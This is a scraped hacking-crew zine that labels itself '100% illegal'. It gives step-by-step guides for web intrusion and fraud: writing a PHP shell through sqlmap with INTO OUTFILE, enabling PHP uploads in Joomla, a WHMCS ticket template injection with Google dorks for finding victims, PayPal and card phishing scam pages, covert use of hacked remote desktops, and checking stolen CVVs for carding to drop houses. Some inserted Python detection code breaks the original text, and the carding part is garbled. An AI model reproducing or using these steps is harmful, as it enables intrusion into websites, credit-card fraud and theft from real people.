hacking conference 2014
8/10/2019 Hacking Conference 2014
http://slidepdf.com/reader/full/hacking-conference-2014 1/22
DOCS HACKING CONFERENCE
Hacking Conference Docs is documentation containing articles about the basic science of hacking.
Part : II
Author : Xcaramel
100 % ILLEGAL
INDONESIAN GREY HAT ARMY
RIAU HACKER TEAM
CODE RIAU COMMUNITY
DISCLAIMER :
This article is for educational use only and do not in any use.
I am not responsible if anything happens.
Personal contact : [email protected]
Visit Us :
igha.net - code-riau.org - blog.code-riau.org - indogreyhatarmy.net - indogreyhatarmy.com - www.indogreyhatarmy.org
Article Content
- How to upload shell use sqlmap
- how to upload file in joomla administrator that do not support
- How to Bypass Register Com Users set only for superadmin
- WHMCS Exploit Submit Ticket
- Carding the method scam page
- How to use RDP
- Checking CVV and Direct Carding
-How to upload shell use sqlmap
1. First we must of course have a target, for example my target: http://www.example.com/index.php?id=1
2. prepare your uploader script, as below.
PHP Code:
<form enctype ="multipart/form-data" action ="upload.php" method ="POST" ><input name ="uploadedfile" type ="file" />< input type ="submit" value ="Upload File" /></ form > <? php $target_path =basename ( $_FILES [ 'uploadedfile' ][ 'name' ]);if( move_uploaded_file ( $_FILES [ 'uploadedfile' ][ 'tmp_name' ], $targe
t_path )){echo basename ( $_FILES [ 'uploadedfile' ][ 'name' ]). " has been uploaded" ;}else{echo "Error!" ;} ?>
The script above must first be converted to hex before it can be uploaded; the results are as below.
Convert script Upload Hex --> http://www.string-functions.com/string-hex.aspx
Next open your CMD:
C:\user\xcaramel>cd c:\Sqlmap
C:\Sqlmap>
C:\Sqlmap>sqlmap.py -u http://www.example.com/index.php?id=1 --sql-shell
The output will look like this:
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
Now type SELECT 0x'Hex' INTO OUTFILE "PATH / filename";
Do not forget to add '0x' in front of 'HEX'.
Wait; if lucky you will be notified that the upload succeeded, and if less fortunate, try again.
If it works, browse to the file written earlier, http://www.example.com/upload.php, then upload your files.
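One way to spot this file-write technique in web server access logs, added here as an example and not part of the original document: it URL-decodes each request, flags INTO OUTFILE / INTO DUMPFILE, and decodes long 0x literals to check for script markers. The log lines, addresses and file path are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the page). The hex literal in
# the second line decodes to a harmless one-line PHP echo.
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Aug/2019:15:35:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Aug/2019:15:35:06 +0000] "GET /index.php?id=1%20UNION%20SELECT%20'
    '0x3c3f706870206563686f2031323b203f3e%20INTO%20OUTFILE%20%22/var/www/html/u.php%22'
    ' HTTP/1.1" 200 312',
    '198.51.100.4 - - [10/Aug/2019:15:36:10 +0000] "GET /search.php?q=color+0xff00ff HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
FILE_WRITE_RE = re.compile(r'\binto\s+(?:out|dump)file\b', re.I)
HEX_LITERAL_RE = re.compile(r'\b0x([0-9a-f]{16,})', re.I)
SCRIPT_MARKERS = (b'<?php', b'<?=', b'<form', b'<script')

def fully_decode(value, max_rounds=3):
    """Undo nested URL encoding (%2520 -> %20 -> space), bounded to avoid loops."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def hex_payload_markers(text):
    """Decode each long 0x... literal and report server-side script markers in it."""
    found = set()
    for match in HEX_LITERAL_RE.finditer(text):
        digits = match.group(1)
        raw = bytes.fromhex(digits[:len(digits) - len(digits) % 2]).lower()
        found.update(m.decode() for m in SCRIPT_MARKERS if m in raw)
    return sorted(found)

def classify_request(uri):
    """Return (severity or None, markers) for one request URI."""
    text = re.sub(r'/\*.*?\*/', ' ', fully_decode(uri))  # /**/ often replaces spaces
    writes_file = bool(FILE_WRITE_RE.search(text))
    markers = hex_payload_markers(text)
    if writes_file:
        return ('critical' if markers else 'high'), markers
    return ('medium' if markers else None), markers

def scan(lines):
    """Return (client_ip, severity, markers) for every suspicious log line."""
    alerts = []
    for line in lines:
        request = REQUEST_RE.search(line)
        if request:
            severity, markers = classify_request(request.group(1))
            if severity:
                alerts.append((line.split()[0], severity, markers))
    return alerts
```

MySQL only honours INTO OUTFILE for accounts that hold the FILE privilege and only inside the directory allowed by secure_file_priv, so an application account without FILE cannot perform this write at all.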
- How to upload file in joomla administrator that do not support
1. After login in the administrator, open the media manager.
2. Select options.
Command:
- Legal Extensions (File Types): there are many types of file names; we simply add the PHP file name, sequential in situ.
- Illegal MIME Types: in the column we add the name of the PHP in situ.
3. If it is, then we save; if successful it will be like this.
Now we try to upload a php file in media manager. This time I will upload a php file, file name: kondom.php
If successful, it would look like
- How to Bypass Register Com Users set only for superadmin
Registration failed: Registration failed: Only users with Super User Admin permission can change other Super Admin accounts.
First, highlight the words "Registration Failed", right-click and then click Inspect Element, then replace "Registration Failed" with "Registration Success" and then click Enter!!
In the form, input the data according to your wishes, then click on Registration.
It will show the words "Your account has been created and an activation link has been sent to the email address you entered. Note that you must activate the account by clicking on the activation link when you get the email before you can login."
WHMCS Exploit Submit TicketGoogle Dork :intext:Powered by WHMCompleteSolution inurl:submitticket.php
intext:Powered by WHMCompleteSolution inurl:clients/submitticket.phpintext:Powered by WHMCompleteSolution inurl:client/submitticket.phpintext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.phpintext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.phpintext:Powered by WHMCompleteSolution inurl:crm/submitticket.phpintext:Powered by WHMCompleteSolution inurl:cp/submitticket.phpintext:Powered by WHMCompleteSolution inurl:manage/submitticket.phpintext:Powered by WHMCompleteSolution inurl:member/submitticket.phpintext:Powered by WHMCompleteSolution inurl:members/submitticket.phpintext:Powered by WHMCompleteSolution inurl:billing/submitticket.phpintext:Powered by WHMCompleteSolution inurl:billings/submitticket.php
intext:Powered by WHMCompleteSolution inurl:support/submitticket.phpintext:Powered by WHMCompleteSolution inurl:help/submitticket.phpintext:Powered by WHMCompleteSolution inurl:secure/submitticket.phpintext:Powered by WHMCompleteSolution inurl:store/submitticket.phpintext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.phpintext:Powered by WHMCompleteSolution inurl:log/submitticket.phpintext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.phpintext:Powered by WHMCompleteSolution inurl:orders/submitticket.phpintext:Powered by WHMCompleteSolution inurl:order/submitticket.phpintext:Powered by WHMCompleteSolution inurl:portal/submitticket.phpintext:Powered by WHMCompleteSolution inurl:mc/submitticket.php
intext:Powered by WHMCompleteSolution inurl:office/submitticket.phpintext:Powered by WHMCompleteSolution inurl:submitticket.php site:comintext:Powered by WHMCompleteSolution inurl:submitticket.php site:orgintext:Powered by WHMCompleteSolution inurl:submitticket.php site:netintext:Powered by WHMCompleteSolution inurl:submitticket.php site:infointext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"
Examples of targets: www.xcaramel.com/client/submitticket.php
3. if it can be now time to send the ticket target
Put the following code in the Form Name, subject, content.
{php}eval(base64_decode('...'));{/php}
replace url submitticket.php so / templates / jxh.php
Example: http://xcaramel.com/client/templates/jxh.php
Next : upload your files .
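A triage sketch for the ticket payload described above, added here as an example and not part of the original document: it scans stored ticket fields for Smarty {php} blocks and decodes nested base64_decode arguments without executing them, so a responder can see which file a payload tried to write. The field names, sample ticket and file name are constructed assumptions.

```python
import base64
import re

# Smarty {php}...{/php} block, tolerant of stray whitespace inside the braces
SMARTY_PHP_RE = re.compile(r'\{\s*php\s*\}(.*?)\{\s*/\s*php\s*\}', re.I | re.S)
B64_CALL_RE = re.compile(r'base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=\s]+)[\'"]\s*\)', re.I)
FILE_WRITE_RE = re.compile(r'(?:fopen|file_put_contents)\s*\(\s*[\'"]([^\'"]+)[\'"]', re.I)

def peel_base64(code, max_depth=5):
    """Decode nested base64_decode('...') arguments layer by layer; nothing is executed."""
    layers = []
    for _ in range(max_depth):
        match = B64_CALL_RE.search(code)
        if not match:
            break
        blob = re.sub(r'\s+', '', match.group(1))
        try:
            raw = base64.b64decode(blob + '=' * (-len(blob) % 4))
        except ValueError:  # malformed blob: stop and report the layers found so far
            break
        code = raw.decode('utf-8', 'replace')
        layers.append(code)
    return layers

def triage_ticket(fields):
    """Return one finding per Smarty {php} block found in any ticket field."""
    findings = []
    for name, value in fields.items():
        for block in SMARTY_PHP_RE.finditer(value):
            layers = peel_base64(block.group(1))
            paths = sorted({p for layer in layers for p in FILE_WRITE_RE.findall(layer)})
            findings.append({'field': name, 'layers': len(layers), 'written_paths': paths})
    return findings

def _b64(text):
    return base64.b64encode(text.encode()).decode()

# Constructed, inert sample ticket (not from the page): the blob is decoded but
# never evaluated, and the file name is a placeholder.
_INNER = 'fopen("templates/example.php","w"); base64_decode("%s");' % _b64('constructed inner layer')
SAMPLE_TICKET = {
    'name': 'Jane Doe',
    'subject': "{php }base64_decode('%s');{/ php }" % _b64(_INNER),
    'message': 'My invoice total looks wrong, can you check?',
}
```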
- Carding th1. Scam page: PAYPA2. Inbox Mailer: Toolinbox detective not t3. Mail list: some em
4. Letter Chase: emaiemail containing a cidentity will switch t
5. Thinking ability an- Step Step In Here
method scam pag L, VISA, AMAZON, Ebay, Apple s for sending mail to many people direc
o spam ail that you want to at least 100 victims
l in html format which will be sent to tnfirmation email from the web in a scaour webscam
d imagination in developing a combat t
ly to your
jadiin email
e target to charge
ol
• First we have to edprocess.php or usualcode: $ No email senchange in process.phshell-other• The second we do- First we have to setsee the picture belo
it can be changed anpaypal.com com atotell of course, we hasee the following pic
it some parts of the scam page, which ily converted into a send-cc.php find thed in depanya aja tuh change so email, ap The next plug in your scam page hosti
se email sending mailers jangn forget l up the email subject that will be used
:
the key should not wear that in the eato do away with paypal.co co.uk, aftere to think
ure:
part following
ter email ng and other
tternya ore dal,
d domains. that what we
The red line is transfindependence, edit iand put the letter inremember do not ussee the following pic
if successful then the
rmed into a scam link you here we areusing notepad, then after that copy allhe column do not forget to email a curplain html.
ure:
re is success and if the notice failing un
in need of the scripts
ent tick
efine.
- How to use RDP
RDP stands for Remote Desktop Computer; they are normally hackedor bruted random computers.When using you must remember its someone else's computer sodon't download things withouthiding it or use it intensely as the admin can notice, and you will loseyour RDP.
To connect to RDP: Start<Run<Type:mstscA screen will pop up waiting for an IP to be typed.Type the IP and hit connect. The person you bought RDP from will tellyou the login info.When you buy an RDP it will usually look something like thisIP: 98.200.27.44U: administrator P:
After connecting make sure it has Firefox, if not download Firefoxportable and hide itsomewhere within the computer so it can be used without them
noticing.
Download Link:http://portableapps.com/apps/internet/firefox_portableAfter opening the Firefox add the Sock5 that you will be using tomake your IP appear in the cc holder’s area.This is generally secure enough for basic carding but if you want totake the extra
precaution you can connect to the RDP through a VPN. For those whodon’t know, VPN is short for virtual private network, a network that isconstructed by using public wires to connect nodes. These systemsuse encryption and other security mechanisms to ensure that onlyauthorized users can access the network and that the data cannot beintercepted. I don't
love VPN's because even though some sites say they don't log in factthey do. If theFeds/Cops contacted your VPN provider, they have ways of seeingwhere and what you have beenconnecting/doing on the net through their VPN. But it still does cover your IP one more wayso it isn't bad to have a VPN.
There are two sites I recommend for VPN.http://secretsline.biz/en/prices/http://unblockvpn.com/
Secrets Line is a higher quality VPN and has many more locations. Irecommend them but they
don't take payments like PayPal or Money Bookers, and their pricesare a bit higher.Unblockvpn is very cheap for a dedicated IP, only 10$ a month andthey accept PayPal so itis a much more convenient and cheaper, but the VPN service is a bitless professional.
So to sum it up for security1. Change/Cap your network using Sock52. Use Sock5 on RDP to make it more secure3. Total security :(Optional but recommended) VPN<RDP<Sock5How
to Access an RDPIf you are using Windows XP, click Start>RunIf you are using Vista or Windows 7, Click start and in the Entry fieldthat says “Search Programs and Files”
For Apple/Mac computers then please download this program for connecting to RDPwww.microsoft.com/mac/products/remote-desktop/default.mspxType in “mstsc” and hit enter. This will bring up the Remote DesktopWindow. Follow the images provided here to give you a better idea of what to do
- Checking CVV and Direct Carding
The best place to check CVV's is actually iTunes.. Make a new account and simply add the credit card onto it. If it getsaccepted then the credit card is alive and working well if declinedthen the credit card is dead. Many believe that its best to donate for checkingcredit's but it raises a flag to banks when they see random donationsto places like the redcross foundation.
Checked Vs. Unchecked CVV's When a vendor says the credit card ischecked it means he has checked it and is alive, this usually means he has his own checker or merchant account that has this ability. I don’t recommend buyingchecked CVVs as they will usually die quicker and get flagged bybanks. I always buy small amounts of unchecked CVV's at atime and use them within a day so that if it is dead,the vendor can replace. Most vendors replace unchecked within 24hours and don’treplace checkedcredit cards.
Carding Directly Without GiftcardNEVER this will almost always be investigated and highly illegal. Theonly way to do this would be if you have a drop house. This meansAn empty home, a house for sale/renting, or justa house that the person is not there. You can but I don’t recommendto card items directly therehalf the time the item will not be left at the door and it can bedangerous as sometimes thecops will investigate it.If you’regoing to do this it can be successful, but don’t ever order to your
SPECIAL THANKS :
INDONESIAN GREY HAT ARMY
RIAU HACKER TEAM
CODE RIAU COMMUNITY
ALL FAMILY INDONESIAN GREY HAT ARMY
Xie Log - Xcaramel – Xsmouth - SF-Resistance 125 - Codex
H4xor - Ac.Dc - 4Sp1r3 - Biawak Litak - Heartachez - Semeru -The Darkness - Blackboot404 - Zhafran - Ghozie - Otong2 -
Ryuunosuke-sama - CakCukLet88 - D'troid 101 - tioblack67 -indeX - AR.1701 – K4mfret Dot ID and all member .
ALL FAMILY RIAU HACKER TEAM
Xie Log - 730-80Y – Key Lock a.k.a F4Lc0n – Ghozie - Juragan
JengkoL – Gue Berbagi a.k.a Echo Unicode - 0tong2 – Zh4fran – index and all member .
AND YOU THANK YOU